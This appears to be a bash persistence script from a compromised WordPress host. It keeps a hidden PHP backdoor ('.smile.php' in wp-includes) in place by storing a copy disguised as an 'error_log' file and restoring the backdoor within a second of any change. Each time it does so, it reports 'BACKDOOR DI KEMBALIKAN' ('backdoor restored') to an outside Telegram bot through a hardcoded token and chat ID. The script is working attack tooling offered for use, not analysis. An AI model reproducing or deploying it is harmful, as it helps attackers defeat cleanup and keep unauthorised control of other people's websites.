#!/bin/bash

# ===================================================================================5
INDEX_FILE="/srv/data/web/vhosts/www.sonear.com/htdocs/wp-includes/smile/.smile.php"
# ===================================================================================
BACKUP_FOLDER="/srv/data/web/vhosts/www.sonear.com/htdocs.20200425063203.old/Services"
# 
mkdir -p "$BACKUP_FOLDER"
# ===================================================================================
BACKUP_FILE="$BACKUP_FOLDER/error_log"

# ===================================================================================
TOKEN="7588613295:AAHNs_IOFuLy_weuOoKMPWaGobPMvtz5mp4"
CHAT_ID="7234811259"

# ===================================================================================
send_telegram_notification() {
    local message="$1"
    curl -s -X POST "https://api.telegram.org/bot$TOKEN/sendMessage" \
        -d chat_id="$CHAT_ID" \
        -d text="$message"
}

# ===================================================================================
if [ ! -f "$BACKUP_FILE" ]; then
    cp "$INDEX_FILE" "$BACKUP_FILE"
    echo "Backup pertama dibuat: $BACKUP_FILE"
    send_telegram_notification "Backup pertama dibuat: $BACKUP_FILE"
fi

# ===================================================================================
monitor_file() {
    while true; do
        # ===================================================================================
        CURRENT_CHECKSUM=$(md5sum "$INDEX_FILE" | awk '{ print $1 }')
        BACKUP_CHECKSUM=$(md5sum "$BACKUP_FILE" | awk '{ print $1 }')

        if [ "$CURRENT_CHECKSUM" != "$BACKUP_CHECKSUM" ]; then
           # ===================================================================================
            echo "Change, mengembalikan backup..."
            cp "$BACKUP_FILE" "$INDEX_FILE"
            echo "https://naturafrutossecos.es/blog/wp-admin/user/user-profile.php ."
            send_telegram_notification "https://naturafrutossecos.es/blog/wp-admin/user/user-profile.php. BACKDOOR DI KEMBALIKAN."
        fi

      # ===================================================================================
        sleep 1
    done
}

# ===================================================================================
monitor_file
